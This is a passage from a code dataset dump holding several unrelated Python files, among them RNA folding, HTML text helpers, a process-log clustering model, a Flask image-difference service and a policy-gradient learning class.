                    glue.CfnTrigger.ActionProperty(\n                        job_name=dataset.GlueProfilingJobName, arguments=job_args\n                    )\n                ],\n            )\n            trigger.node.add_dependency(job)\n\n        Tags.of(self).add('Classification', dataset.confidentiality)\n\n        TagsUtil.add_tags(stack=self, model=Dataset, target_type=\"dataset\")\n\n        CDKNagUtil.check_rules(self)\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/modules/datasets/cdk/dataset_stack.py","file_name":"dataset_stack.py","file_ext":"py","file_size_in_byte":22228,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"} +{"seq_id":"30264362493","text":"import numpy as np\n\n\ndef score(valueCG, valueAU, base1, base2):\n    if (base1 == 'A' and base2 == 'U') or (base1 == 'U' and base2 == 'A'):\n        return valueAU\n    if (base1 == 'C' and base2 == 'G') or (base1 == 'G' and base2 == 'C'):\n        return valueCG\n    else:\n        return 0\n\n\ndef nussinov(seq, valueCG, valueAU):\n    N = len(seq)\n    scoreMatrix = np.zeros((N, N), dtype=int)\n    for k in range(N):\n        for i, j in zip(range(0, N - k), range(k+1, N)):\n            max_k = (\n                lambda i, j: max(\n                    scoreMatrix[i, m] + scoreMatrix[m + 1, j] for m in range(i + 1, j)\n                )\n                if j-i > 1\n                else 0\n            )\n            scoreMatrix[i][j] = max(\n                scoreMatrix[i + 1, j],\n                scoreMatrix[i, j - 1],\n                scoreMatrix[i + 1, j - 1] + score(valueCG, valueAU, seq[i], seq[j]),\n                max_k(i, j)\n            )\n\n    return scoreMatrix\ndef traceback(i, j, structure, DP, sequence, valueCG, valueAU):\n    #in this case we've gone through the whole sequence. Nothing to do.\n    if j <= i:\n        return\n    #if j is unpaired, there will be no change in score when we take it out, so we just recurse to the next index\n    elif DP[i][j] == DP[i][j-1]:\n        traceback(i, j-1, structure, DP, sequence, valueCG, valueAU)\n    elif DP[i][j] == DP[i+1][j]:\n        traceback(i+1, j, structure, DP, sequence, valueCG, valueAU)\n    elif DP[i][j] == DP[i+1][j-1] + score(valueCG, valueAU, sequence[i], sequence[j]):\n        structure.append((i, j))\n        traceback(i + 1, j - 1, structure, DP, sequence, valueCG, valueAU)\n    else:\n        val, k = max([(DP[i][k] + DP[k + 1][j],k) for k in range(i + 1, j)])\n        if DP[i, j] == val:\n            traceback(i, k, structure, DP, sequence, valueCG, valueAU)\n            traceback(k+1, j, structure, DP, sequence, valueCG, valueAU)\n\ndef write_structure(sequence, structure):\n    dot_bracket = [\".\" for _ in range(len(sequence))]\n    for s in structure:\n        dot_bracket[min(s)] = \"(\"\n        dot_bracket[max(s)] = \")\"\n    return \"\".join(dot_bracket)\ndef parenthesingNussinov(seq, scoreMatrix, valueCG, valueAU):\n    struct = []\n    traceback(0, len(seq)-1, struct, scoreMatrix, seq, valueCG, valueAU)\n    return (write_structure(seq, struct), struct)\nseq = \"AGUCUGA\"\nprint(nussinov(seq, 2, 1))\nprint(parenthesingNussinov(seq,nussinov(seq, 2, 1),2,1))\n","repo_name":"KamiRab/Nussinov","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39918522228","text":"\"\"\" Helper methods for Magnetizer\n\"\"\"\n\nfrom re import sub, search, compile as re_compile\n\nCOLOUR_OK = '\\033[92m'\nCOLOUR_WARNING = '\\033[93m'\nCOLOUR_ERROR = '\\033[91m'\nCOLOUR_END = '\\033[0m'\n\n\ndef link_h1(html, url):\n    \"\"\"Add a link to the first <h1> in the provided html\n\n    Parameters:\n    html - the html potentially containing the <h1>\n    url - the URL to link to\n\n    Returns:\n    The same html but with a link in the first <h1>\n    \"\"\"\n\n    match = search(r\"<h1>(.*?)<\\/h1>\", html)\n\n    if match:\n        heading = match.group()\n        heading_content = match.group(1)\n        
return html.replace(heading, \"<h1>\" + wrap_it_in_a_link(heading_content, url) + \"</h1>\", 1)\n\n return html\n\n\ndef wrap_it_in_a_link(html, url):\n \"\"\" Wrap a link around some arbitrary html\n\n Parameters:\n html - the html around which to wrap the link\n url - the URL to link to\n\n Returns:\n The same html but with a link around it\n \"\"\"\n\n return \"<a href='\" + url + \"'>\" + html + \"</a>\"\n\n\ndef downgrade_headings(html):\n \"\"\" 'Downgrade' headings one step, so that <h3> becomes <h4>, <h2> becomes <h3> etc\n\n Parameters:\n html - the html potentially containing <h1>, <h2> etc tags\n\n Returns:\n The same html but with h1, h2 and h3 downgraded one step\n \"\"\"\n\n html = html.replace('<h3', '<h4')\n html = html.replace('</h3', '</h4')\n\n html = html.replace('<h2', '<h3')\n html = html.replace('</h2', '</h3')\n\n html = html.replace('<h1', '<h2')\n html = html.replace('</h1', '</h2')\n\n return html\n\n\ndef abstract_from_html(html):\n \"\"\" Creates a Twitter card-friendly abstract from some html\n\n Parameters:\n html - the html to create an abstract from\n\n Returns:\n The first 300 characters from the html that are not html tags\n \"\"\"\n\n abstract = strip_tags_from_html(strip_anything_before_h1_from_html(html)).strip()\n abstract = sub(r'\\n', ' ', abstract)\n abstract = sub(r'\\s\\s+', ' ', abstract)\n\n if len(abstract) > 300:\n abstract = abstract[0:300] + '…'\n return abstract\n\n\ndef first_image_url_from_html(html):\n \"\"\" Find the first image url in some html\n\n Parameters:\n html - html potentially containing <img> tags\n\n Returns:\n The URL from the first image in the html (or None if none)\n \"\"\"\n\n pattern = \"<img .*?src=['\\\"](.*?)['\\\"].*?>\"\n match = search(pattern, html)\n\n if match:\n return match.group(1)\n\n return None\n\n\ndef strip_tags_from_html(html):\n \"\"\" Remove html tags from html\n\n Parameters:\n html - the html to remove tags from\n\n Returns:\n The html with all tags stripped\n\n todo: make better so that text between < and > isn't removed\n \"\"\"\n\n tag_re = re_compile(r'(<!--.*?-->|<[^>]*>)')\n return tag_re.sub('', html)\n\n\ndef strip_anything_before_h1_from_html(html):\n \"\"\" Strip everything before the first <h1> tag in the html\n\n Parameters:\n html - the html potentially containing a <h1>\n\n Returns:\n The same html, but without anything before the first <h1> tag (if there is one)\n \"\"\"\n\n stripped_html = html.strip()\n if '</h1>' in stripped_html:\n return stripped_html.split('</h1>', 1)[1]\n\n return html\n\n\ndef purge_non_article_filenames(filenames):\n \"\"\" Removes filenames not ending with .md from a list of filenames\n\n Parameters:\n filenames - list of filenames\n\n Returns:\n The list of filenames but with any filenames not ending with .md removed\n \"\"\"\n\n result = []\n\n for filename in filenames:\n if search(r'^\\d+-\\S+\\.md$', filename):\n result.append(filename)\n\n return result\n\n\ndef md_footnotes(source):\n \"\"\" Adds footnote anchor links to a block of markdown, linking from [^nn] to [^nn]:\n\n Parameters:\n source - a block of markdown\n\n Returns:\n Markdown with footnote anchor links added\n \"\"\"\n\n result = source\n\n # replace references [^nn] with \"<a href='#nn'>[nn]</a>\"\n reference_re = re_compile(r'\\[\\^(\\d+?)\\](?!:)')\n result = reference_re.sub(r\"<a href='#\\1'>[\\1]</a>\", result)\n\n # replace footnotes [^nn]: with \"<a id='nn'>[nn]:\"\n footnote_re = re_compile(r'\\[\\^(\\d+?)\\]:')\n result = footnote_re.sub(r\"<a id='\\1'></a>[\\1]:\", 
result)\n\n    return result\n","repo_name":"magnusdahlgren/magnetizer","sub_path":"magnetizer/mutil.py","file_name":"mutil.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4179792867","text":"# Subprogram\n\ndef listaAprovadosReprovados2(infos, minimo):\n    for pos in range(len(infos)):\n        media = (infos[pos][1][0]+infos[pos][1][1]+infos[pos][1][2])/3\n\n        if media >= minimo:\n            print(infos[pos][0], \"Passed with grade:\", media)\n\n    print(\"-----------------------------------------------------------\")\n    for pos in range(len(infos)):\n        media = (infos[pos][1][0] + infos[pos][1][1] + infos[pos][1][2]) / 3\n\n        if media < minimo:\n            print(infos[pos][0], \"Failed with grade:\", media)\n\n    return None\n\ndef leAlunosComNotas(qtdAlunos, qtdNotas):\n    resposta = [] # initialize the answer as an empty list\n\n    for indAluno in range(qtdAlunos):\n        nome = input(\"Enter the name of student \" + str(indAluno + 1) + \": \")\n        linha = [nome,[]] # each row holds a name and an empty list of grades\n\n        for indNota in range(qtdNotas):\n            nota = float(input(\"Enter grade \" + str(indNota + 1) + \" = \"))\n            linha[1].append(nota) # append the grade just read to the end of the grade list\n\n        resposta.append(linha) # append the row with name and grades to the end of the list\n\n    return resposta\n\n# Main Program\n\nresultados = leAlunosComNotas(5,3)\nlistaAprovadosReprovados2(resultados, 6.0)","repo_name":"thcborges/CompCEDERJ-FP","sub_path":"Aulas/Aula 05/aula05-alunosAprovadosEntradaDinamica.py","file_name":"aula05-alunosAprovadosEntradaDinamica.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73099072759","text":"from FrequencyEncoder import FrequencyEncoder\nfrom LastStateEncoder import LastStateEncoder\nfrom sklearn.cluster import KMeans\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport time\nfrom datetime import datetime, timedelta\nimport numpy as np\n\nclass ClusteringPredictiveModel:\n    \n    def __init__(self, case_id_col, event_col, label_col, timestamp_col, cat_cols, numeric_cols, n_clusters,n_sub_family, n_estimators, random_state=22, fillna=True, pos_label=\"A_Pending\"):\n        \n        # columns\n        self.case_id_col = case_id_col\n        self.label_col = label_col\n        self.pos_label = pos_label\n        self.avg_sys=0\n        self.avg_usr=0\n        self.n_clusters = n_clusters\n        \n        self.freq_encoder = FrequencyEncoder(case_id_col, event_col)\n        self.data_encoder = LastStateEncoder(case_id_col, timestamp_col, cat_cols, numeric_cols, fillna)\n        self.clustering = KMeans(n_clusters, random_state=random_state)\n        self.sub_clustering = KMeans(n_sub_family, random_state=random_state)\n        self.clss = [RandomForestClassifier(n_estimators=n_estimators, random_state=random_state) for _ in range(n_clusters*n_sub_family)]\n        \n        self.avg_time_train=np.zeros(n_clusters)\n        self.avg_all_train=0\n        self.avg_time_test=np.zeros(n_clusters)\n        self.avg_all_test=0\n        self.n_sub_family=n_sub_family\n        self.sys=np.zeros(n_clusters*n_sub_family)\n        self.usr=np.zeros(n_clusters*n_sub_family)\n        self.tot=np.zeros(n_clusters*n_sub_family)\n\n    def throughput(self,x): #for one case\n        i=x.index[0]\n        t1=x['Start Timestamp'][i]\n        t= time.strptime(t1, \"%Y/%m/%d %H:%M:%S.%f\")\n        i+=1\n        sys=0 # delay by system\n        usr=0 # delay by user\n        system=True\n        while i < x.index.max():\n            #print('before ', i)\n            if x['Activity'][i]=='O_Sent (mail and online)' or 
x['Activity'][i]=='O_Sent (online only)':\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n s=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n sys+=86400 * s.days + s.seconds\n system=False\n t=t2\n #print('send ',sys)\n\n if x['Activity'][i]=='A_Validating' :\n t2=x['Start Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n u=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n usr+=86400 * u.days + u.seconds\n system=True\n t=t2\n #print('val :',usr)\n\n i+=1\n #print(i)\n if i==x.index.max():\n if system:\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n s=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n sys+=86400 * s.days + s.seconds\n #print('final sys ',sys)\n else:\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n u=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n usr+=86400 * u.days + u.seconds\n #print('fainal usr ',usr)\n \n return np.array([sys,usr])\n\n def execution_time(self,x): #for one case\n t=x['Start Timestamp'][x.index.min()]\n t = time.strptime(t, \"%Y/%m/%d %H:%M:%S.%f\")\n t2=x['Complete Timestamp'][x.index.max()]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n exe=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n return (86400 * exe.days + exe.seconds)\n\n def average_in_cluster(self,x):\n return np.mean(x['sys']+x['usr'])\n\n def sub_family(self,x):# for one case\n if x['sys'][0]>self.avg_sys and x['usr'][0]>self.avg_usr: #ss\n return 0\n elif x['sys'][0]>self.avg_sys and x['usr'][0]<self.avg_usr: #sf\n return 1\n elif x['sys'][0]<self.avg_sys and x['usr'][0]>self.avg_usr: #fs\n return 2\n elif x['sys'][0]<self.avg_sys and x['usr'][0]<self.avg_usr: #ff\n return 3 \n\n\n def fit(self, X, y=None):\n \n # encode events as frequencies\n data_freqs = self.freq_encoder.fit_transform(X)\n \n # cluster traces according to event frequencies \n cluster_assignments = self.clustering.fit_predict(data_freqs)\n \n #avg_grouping=X.groupby(self.case_id_col)\n #ex=avg_grouping.apply(lambda x: execution_time(x))\n #self.avg=ex.mean()\n \n #avg_grouping1=X.groupby(['Case ID'])\n #avg1=avg_grouping1.apply(lambda x: self.throughput(x))\n #self.avg_sys=np.mean([avg1[p][0] for p in range(len(avg1))])\n #self.avg_usr=np.mean([avg1[p][1] for p in range(len(avg1))])\n\n \n # train classifier for each cluster\n shift=0\n for cl in range(self.n_clusters):\n\n #print('Distribution of cluster ',cl,':', end='')\n cases = data_freqs[cluster_assignments == cl].index\n tmp = X[X[self.case_id_col].isin(cases)]\n tmp = self.data_encoder.transform(tmp)\n self.avg_time_train[cl]=self.average_in_cluster(tmp)\n sub_fammily_assignments=self.sub_clustering.fit_predict(tmp[['usr']])\n mean=0\n for s_cl in range (self.n_sub_family):\n print('cluster ',s_cl+shift,':', end='')\n s_cases=tmp[sub_fammily_assignments==s_cl]['Case ID']\n tempo=tmp[tmp[self.case_id_col].isin(s_cases)]\n self.clss[s_cl+shift].fit(tempo.drop([self.case_id_col, self.label_col,'sys','usr'], axis=1), tempo[self.label_col])\n avg=int(round(self.average_in_cluster(tempo)/86400))\n avg_usr=int(round(np.mean(tempo['usr'])/86400))\n avg_sys=int(round(np.mean(tempo['sys'])/86400))\n self.sys[s_cl+shift]=avg_sys\n self.usr[s_cl+shift]=avg_usr\n self.tot[s_cl+shift]=avg\n print(' ',len(tempo),' avg: ',avg,' client ',avg_usr,' system ',avg_sys)\n #mean+=avg\n 
\t#print(' ',len(tempo),end='')\n shift+=self.n_sub_family\n #print(' avg_tot ',round(mean/self.n_sub_family))\n print('')\n return self\n \n\n def predict_proba(self, X):\n \n # encode events as frequencies\n data_freqs = self.freq_encoder.transform(X)\n \n # calculate closest clusters for each trace \n cluster_assignments = self.clustering.predict(data_freqs)\n \n # predict outcomes for each cluster\n cols = [self.case_id_col]+list(['A_Pending','A_Denied','A_Cancelled'])\n preds = pd.DataFrame(columns=cols)\n self.actual = pd.DataFrame(columns=cols)\n shift=0\n self.avg_time_test=np.zeros(self.n_clusters)\n for cl in range(self.n_clusters):\n #print('Distribution of cluster ',cl,':',end='')\n\n # select cases belonging to given cluster\n cases = data_freqs[cluster_assignments == cl].index\n if len(cases):\n tmp = X[X[self.case_id_col].isin(cases)]\n \n # encode data attributes\n\n tmp = self.data_encoder.transform(tmp)\n sub_fammily_assignments=self.sub_clustering.predict(tmp[['usr']])\n mean=0\n for s_cl in range(self.n_sub_family):\n s_cases=tmp[sub_fammily_assignments==s_cl]['Case ID']\n if len(s_cases)>0:\n print('cluster ',s_cl+shift,':',end='')\n\n tempo=tmp[tmp[self.case_id_col].isin(s_cases)]\n new_preds = pd.DataFrame(self.clss[s_cl+shift].predict_proba(tempo.drop([self.case_id_col, self.label_col,'sys','usr'], axis=1)))\n new_preds.columns = self.clss[s_cl+shift].classes_\n new_preds[self.case_id_col] = tempo.droplevel(1).index\n preds = pd.concat([preds, new_preds], axis=0, ignore_index=True,sort=False)\n actuals = pd.get_dummies(tempo[self.label_col])\n actuals[self.case_id_col] = tempo[self.case_id_col]\n self.actual = pd.concat([self.actual, actuals], axis=0, ignore_index=True,sort=False)\n avg=int(round(self.average_in_cluster(tempo)/86400))\n #mean+=avg\n avg_usr=int(round(np.mean(tempo['usr'])/86400))\n avg_sys=int(round(np.mean(tempo['sys'])/86400))\n if len(s_cases)==1:\n sys=self.sys[s_cl+shift]-avg_sys\n usr=self.usr[s_cl+shift]-avg_usr\n tot=self.tot[s_cl+shift]-avg\n if sys>=0:\n print('')\n print('Remaining time system: ',sys, 'day(s)')\n else:\n print('Delay time system: ',-sys, 'day(s)')\n if usr>=0:\n print('Remaining time client: ',usr, 'day(s)')\n else:\n print('Delay time client: ',-usr, 'day(s)') \n if tot>=0:\n print('Remaining time (total): ',tot, 'day(s)')\n else:\n print('Delay time (total): ',-tot, 'day(s)') \n\n\n print(' ',len(tempo),' avg: ',avg,' client ',avg_usr,' system ',avg_sys)\n \n #print(' ',len(tempo),end='')\n #else:\n \t#print('cluster ',s_cl+shift,':',0,' avg: ',0)\n shift+=self.n_sub_family\n #print(' avg_tot ',round(mean/self.n_sub_family))\n print('')\n else:\n shift+=self.n_sub_family\n preds.fillna(0, inplace=True)\n self.actual.fillna(0, inplace=True)\n #self.actual = self.actual[self.pos_label]\n \n #return preds[self.pos_label]\n return preds \n","repo_name":"Nani-mido/KMeans-client-sys-throughput-time","sub_path":"ClusteringPredictiveModel.py","file_name":"ClusteringPredictiveModel.py","file_ext":"py","file_size_in_byte":10514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39754693093","text":"from collections import defaultdict\n\n\nwith open('input') as f:\n lines = f.read().split('\\n')\nlines = [_ for _ in lines if _]\n\noo = []\noo_list = lines\n\ncoo = []\ncoo_list = lines\n\n\nfor i in range(len(lines[0])):\n c = defaultdict(list)\n if len(oo_list) == 1:\n oo = oo_list[0]\n break\n for word in oo_list:\n c[word[i]].append(word)\n\n if len(c['0']) > 
len(c['1']):\n oo_list = c['0']\n\n oo.append('0')\n else:\n oo_list = c['1']\n oo.append('1')\n\n\nfor i in range(len(lines[0])):\n if len(coo_list) == 1:\n coo = coo_list[0]\n break\n c = defaultdict(list)\n for word in coo_list:\n c[word[i]].append(word)\n\n if len(c['0']) <= len(c['1']):\n coo_list = c['0']\n coo.append('0')\n else:\n coo_list = c['1']\n coo.append('1')\n\ncoo = int(''.join(coo),2)\noo =int(''.join(oo), 2)\nprint(coo * oo)\n","repo_name":"z03h/aoc","sub_path":"2021/03/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2108880223","text":"from gevent import monkey\nif True:\n monkey.patch_all()\n\nimport os\nimport io\nimport uuid\nfrom flask import Flask, request, send_file\nfrom werkzeug.utils import secure_filename\nfrom compare import get_difference, create_difference_image\n\napp = Flask(__name__)\n\n\n@app.route('/difference', methods=['GET'])\ndef difference():\n \"\"\" Gets the structural similarity index between two images\n\n Args:\n file_old: the old file object\n file_new: the new file object\n\n Returns:\n Image structural similarity index\n\n \"\"\"\n # Save both image\n file_old = request.files['file_old']\n file_ID_old = secure_filename(file_old.filename)\n file_path_old = os.path.join('files', file_ID_old)\n file_path_old = os.path.abspath(file_path_old)\n file_old.save(file_path_old)\n\n file_new = request.files['file_new']\n file_ID_new = secure_filename(file_new.filename)\n file_path_new = os.path.join('files', file_ID_new)\n file_path_new = os.path.abspath(file_path_new)\n file_new.save(file_path_new)\n\n # Get structural similarity index\n print(f\"Getting difference between {file_ID_old} and {file_ID_new}\")\n result = str(get_difference(file_path_old, file_path_new))\n print(f\"Done difference between {file_ID_old} and {file_ID_new}\")\n\n # Remove two downloaded files\n os.remove(file_path_old)\n os.remove(file_path_new)\n\n return result\n\n\n@app.route('/difference_image', methods=['GET'])\ndef difference_image():\n \"\"\" Gets an image with bounding boxes with the difference between file_old and file_new\n\n Args:\n file_old: the old file object\n file_new: the new file object\n\n Returns:\n difference image with bounding boxes\n \"\"\"\n\n # Save both image\n file_old = request.files['file_old']\n file_ID_old = secure_filename(file_old.filename)\n file_path_old = os.path.join('files', file_ID_old)\n file_path_old = os.path.abspath(file_path_old)\n file_old.save(file_path_old)\n\n file_new = request.files['file_new']\n file_ID_new = secure_filename(file_new.filename)\n file_path_new = os.path.join('files', file_ID_new)\n file_path_new = os.path.abspath(file_path_new)\n file_new.save(file_path_new)\n\n file_path_difference = os.path.join('files', f'{uuid.uuid4()}.png')\n file_path_difference = os.path.abspath(file_path_difference)\n\n print(f\"Getting difference image between {file_ID_old} and {file_ID_new}\")\n create_difference_image(file_path_old, file_path_new, file_path_difference)\n print(f\"Done difference image between {file_ID_old} and {file_ID_new}\")\n\n # Remove two downloaded files\n os.remove(file_path_old)\n os.remove(file_path_new)\n\n # Buffer file into memmory\n # differece_image_buffer = io.BytesIO()\n # with open(file_path_difference, 'rb') as f:\n # differece_image_buffer.write(f.read())\n # differece_image_buffer.seek(0)\n # os.remove(file_path_difference)\n\n return send_file(file_path_difference, 
mimetype='image/gif')\n\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', port=8002, debug=True)\n","repo_name":"felixjchen/web-watcher","sub_path":"src/compare/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44094827865","text":"## Setup a package for qlearning models\n\nimport numpy as np # for numerical operations\nimport scipy.optimize as opt # for numerical optimization\n\n## STRUCTURE OF PARAMS\n# params = [learning_param1, learning_param2, ..., learning_paramN, model_param1, model_param2, ..., model_paramM]\n \nclass VLPolicyGradient():\n \"\"\"\n Single State Policy gradient model with logistic policy\n Serve as a base class for the different policy gradient models\n \"\"\"\n def __init__(self,eps=1e-6,dx=0.01):\n \"\"\"\n eps: a small number to prevent error for choice probabilities\n dx: the step size for numerical derivatives\n \"\"\"\n self.eps = eps\n self.dx = dx\n\n def policy(self, params):\n \"\"\"\n The policy function\n params: the parameters of the model\n \"\"\"\n params = np.array(params)\n theta = params[0]\n logistic = lambda x: 1/(1+np.exp(-x))\n policy = np.array([logistic(theta), 1-logistic(theta)])\n policy = np.clip(policy, self.eps, 1-self.eps)\n return policy\n \n def log_policy(self, params):\n \"\"\"\n The log policy function\n params: the parameters of the model\n \"\"\"\n return np.log(self.policy(params))\n \n def del_log_policy(self, params):\n \"\"\"\n The numerical derivative of the log policy function\n params: the parameters of the model\n \"\"\"\n n_params = len(params)\n del_log_policy = np.zeros((n_params,2))\n for i in range(n_params):\n param_plus = params.copy()\n param_plus[i] = param_plus[i] + self.dx\n param_minus = params.copy()\n param_minus[i] = param_minus[i] - self.dx\n del_log_policy[i] = (self.log_policy(param_plus) - self.log_policy(param_minus))/(2*self.dx)\n return del_log_policy\n\n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n alpha = params[0]\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha*reward*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n except:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:]\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def prob_choice(self, params, choices, rewards):\n \"\"\"\n Return the probability of the choices given the parameters\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = self.policy_gradient_learning(choices, rewards, params)\n ps = np.zeros((len(choices)+1,2))\n for n, policy_param in enumerate(policy_params):\n 
ps[n] = self.policy(policy_param)\n return ps\n\n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha', 'theta'],\n 'suggested_bounds': [(0,1),(-10,10)],\n 'suggested_init': [0.5,0.],\n 'n_l': 1, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props\n \n def regularizer(self, params):\n \"\"\"\n Calculate the regularizer\n \"\"\"\n return 0\n\n def nll(self, params, choices, rewards):\n \"\"\" \n Calculate the negative log likelihood\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n lls = []\n for i in range(len(choices)):\n # remove after first nan\n if np.any(np.isnan(choices[i])):\n cs = choices[i][:np.argmax(np.isnan(choices[i]))]\n else:\n cs = choices[i]\n if np.any(np.isnan(rewards[i])):\n rs = rewards[i][:np.argmax(np.isnan(rewards[i]))]\n else:\n rs = rewards[i]\n assert len(cs) == len(rs), 'choices and rewards must be same length'\n # calculate the probability of each choice (prob_choice takes params first)\n ps = self.prob_choice(params, cs, rs)[:-1,:]\n # calculate the log likelihood\n lls.append(np.sum(cs * np.log(ps[:,1]) + (1-cs) * np.log(ps[:,0])))\n # return the summation of negative log likelihood\n sum_lls = -np.sum(lls)\n return sum_lls\n \n def normll(self, params, choices, rewards):\n \"\"\"\n Calculate the normalized log likelihood\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n normlls = []\n for i in range(len(choices)):\n # remove after first nan\n if np.any(np.isnan(choices[i])):\n cs = choices[i][:np.argmax(np.isnan(choices[i]))]\n else:\n cs = choices[i]\n if np.any(np.isnan(rewards[i])):\n rs = rewards[i][:np.argmax(np.isnan(rewards[i]))]\n else:\n rs = rewards[i]\n assert len(cs) == len(rs), 'choices and rewards must be same length'\n # calculate the probability of each choice (prob_choice takes params first)\n ps = self.prob_choice(params, cs, rs)[:-1,:]\n # calculate the log likelihood\n normlls.append(np.exp(np.mean(cs * np.log(ps[:,1]) + (1-cs) * np.log(ps[:,0]))))\n # return the average of normalized log likelihood\n mean_normlls = np.mean(normlls)\n return mean_normlls\n \n def nll_reg(self, params, choices, rewards, lambda_reg):\n \"\"\"\n Calculate the negative log likelihood with regularization\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n lambda_reg: the regularization parameter\n \"\"\"\n return self.nll(params, choices, rewards) + self.regularizer(params) * lambda_reg\n \n def fit_all(self, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to the data\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm \n \"\"\"\n if algo == 'shgo':\n bounds = kwargs['bounds']\n # remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with shgo algorithm')\n res = opt.shgo(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),bounds=bounds,**kwargs)\n elif algo == 'de':\n bounds = kwargs['bounds']\n # 
remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with differential evolution algorithm')\n res = opt.differential_evolution(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),bounds=bounds,**kwargs)\n elif algo == 'basinhopping':\n bounds = kwargs['bounds']\n # remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with basinhopping algorithm')\n res = opt.basinhopping(\n self.nll_reg,\n params_init,\n minimizer_kwargs={'args':(choices, rewards, lambda_reg)},**kwargs)\n elif algo == 'da':\n print('Starting optimization with dual annealing algorithm')\n res = opt.dual_annealing(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),**kwargs)\n elif algo == 'minimize':\n assert 'randomize' in kwargs.keys(), 'Must specify whether to randomize initial parameters using \"randomize\" variable'\n assert 'n_restarts' in kwargs.keys(), 'Must specify number of restarts using \"n_restarts\" variable'\n res_list = []\n for X in range(kwargs['n_restarts']):\n print('Starting optimization with minimize. Iteration: {} of {}'.format(X+1,kwargs['n_restarts']))\n bounds = kwargs['bounds']\n if kwargs['randomize']:\n # resample initial parameters\n for i in range(len(params_init)):\n params_init[i] = np.random.uniform(bounds[i][0],bounds[i][1])\n # remove randomize and bounds from kwargs\n kwargs_alt = {k: v for k, v in kwargs.items() if k not in ['randomize','bounds','n_restarts']}\n res = opt.minimize(\n self.nll_reg,\n params_init,\n args=(choices, rewards, lambda_reg),**kwargs_alt)\n res_list.append(res)\n # find best result\n res = res_list[np.argmin([r.fun for r in res_list])]\n else:\n raise ValueError('Invalid algorithm')\n return res\n \n def fit_subject(self, subject, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to a single subject\n subject: the subject to fit the model to\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n res = self.fit_all(\n choices[subject:subject+1], rewards[subject:subject+1], params_init, lambda_reg, algo, **kwargs\n )\n return res\n\n def fit_all_except(self, subject, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to all subjects except one\n 